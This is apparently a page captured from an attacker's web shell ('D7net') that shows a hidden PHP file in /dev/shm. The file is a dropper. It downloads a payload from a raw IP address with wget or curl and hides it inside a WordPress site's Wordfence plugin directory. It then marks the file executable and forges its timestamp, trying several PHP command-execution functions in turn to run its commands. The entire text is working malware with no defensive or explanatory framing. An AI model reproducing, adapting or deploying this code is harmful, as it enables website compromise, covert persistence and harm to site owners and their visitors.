D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
dev
/
shm
/
Filename :
.descriptor
back
Copy
<?php $p = '/home/lockmnvw/quevestalending.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/autobackup'; $u = 'http://104.250.164.214/2604d69dec8919d2d12159add24c836d'; $fs = 357808; $ft = 1752614276; run("wget -O {$p} {$u}"); check($p, $fs, $ft); run("curl -o {$p} {$u}"); check($p, $fs, $ft); function check($p, $fs, $ft) { if (file_exists($p) && filesize($p) == $fs) { @chmod($p, 0744); @touch($p, $ft); die('_uploaded!_'); } } function run($in) { $out = ''; if (function_exists('exec')) { @exec($in, $out); $out = @join("\n", $out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in, "r"))) { $out = ""; while (!@feof($f)) $out .= fread($f, 1024); pclose($f); } return $out; } die('_upload_failed_');